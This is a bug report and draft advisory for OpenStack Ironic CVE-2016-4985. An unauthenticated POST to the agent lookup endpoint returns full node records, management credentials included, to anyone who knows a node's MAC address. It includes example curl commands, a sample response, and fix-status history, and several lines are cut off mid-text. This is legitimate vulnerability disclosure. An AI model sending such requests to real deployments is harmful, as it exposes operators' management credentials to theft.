Node information including credentials exposed to unathenticated users (CVE-2016-4985)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Ironic |
Fix Released
|
High
|
aeva black |
Bug Description
Environment:
- servers are Ubuntu Trusty 14.04.4 LTS
- ironic is deployed as part of an OpenStack cloud, configured to use keystone auth
- ironic is running current master (early Newton) + Neutron integration patches (should be completely unrelated)
- agent_ipmitool driver is enabled
Steps to reproduce:
- enable any of the "agent" class of drivers. For the examples below, let's assume that "agent_ipmitool" is enabled, but this works if any driver that includes the AgentVendorPassthru interface is loaded, even if the Node is not configured to use that driver.
- register a Node in Ironic with any driver
- register a Port in Ironic and associate it to that Node
- send an *unauthenticated* POST request to ${IRONIC_
Result:
- receive the complete Node record (an unauthenticated user should not be able to do that)
- bypass ironic API policy enforcement and retrieve the un-masked management credentials for the Node
- also receive the "heartbeat_timeout" value
Expected result:
- receive only the node UUID and heartbeat_timeout, because this should be all that the IPA ramdisk requires to continue operating
Example curl command:
curl -X POST -H 'X-OpenStack-
-d '{"version": "2", "inventory": { "interfaces": [ { "name": "", "mac_address": "aa:bb:cc:dd:ee:ff" } ] } }' \
https:/
Example result:
{
"heartbeat_
"node" : {
"
"raid_config" : {},
"
"id" : 2,
"
"reservation" : null,
"
"properties" : {
"cpu_arch" : "x86_64",
"cpus" : 8,
"local_gb" : 1116
},
"
"updated_at" : "2016-04-
"created_at" : "2016-04-
"driver" : "agent_ipmitool",
"
"name" : "my-test-system",
"
"driver_info" : {
},
"uuid" : "64d46f02-
"
"
"maintenance" : false,
"extra" : {},
"
"
"chassis_id" : null,
"power_state" : "power off",
"
"
"clean_step" : {},
"
"last_error" : null
}
}
CVE References
Changed in ironic: | |
status: | New → Confirmed |
importance: | Undecided → High |
assignee: | nobody → Devananda van der Veen (devananda) |
summary: |
- Complete node information available to unathenticated users, if they - know MAC address of Node + Node information including credentials exposed to unathenticated users + (CVE-2016-4985) |
Changed in ironic: | |
status: | Confirmed → In Progress |
Changed in ironic: | |
status: | In Progress → Fix Committed |
information type: | Private Security → Public Security |
DRAFT
-----
Title: Ironic Node information including credentials exposed to unauthenticated users
Reporter: Devananda van der Veen
Products: OpenStack Ironic
Affects: >=2014.2, >=4.0.0 <=5.1.1
Description:
Devananda van der Veen reported the following vulnerability in Ironic.
Anyone with network access to the ironic-api service can bypass Keystone authentication and retrieve all information about any Node registered with Ironic, if they know (or are able to guess) the MAC address of a network card belonging to that Node. The HTTP response will include the full Node details, including management passwords, even when /etc/ironic/ policy. json is configured to hide passwords in API responses.
This can be done by sending a request such as the following:
curl -X POST -H "Content-Type: application/json" -d \ $HOST:6385/ v1/drivers/ $DRIVER/ vendor_ passthru/ lookup
'{ "version": "2", "inventory": { "interfaces": [ { "mac_address": "$ADDRESS" } ] } }' \
http://
This affects all instances of Ironic where the "enabled_drivers" setting includes any of the "agent" family of drivers (eg, agent_ssh, agent_ipmitool, agent_ilo). In such an environment, all Nodes may be exposed, even Nodes that are configured with another driver, including even if no Nodes are configured to use any of the agent_* drivers.
This vulnerability has been verified in all currently supported branches (liberty, mitaka, master) and traced back to code introduced in commit 3e568fbbbcc5748 035c1448a0bdb26 306470797c during the Juno development cycle. Therefore, it is likely that both juno and kilo braches (and their releases) are also affected.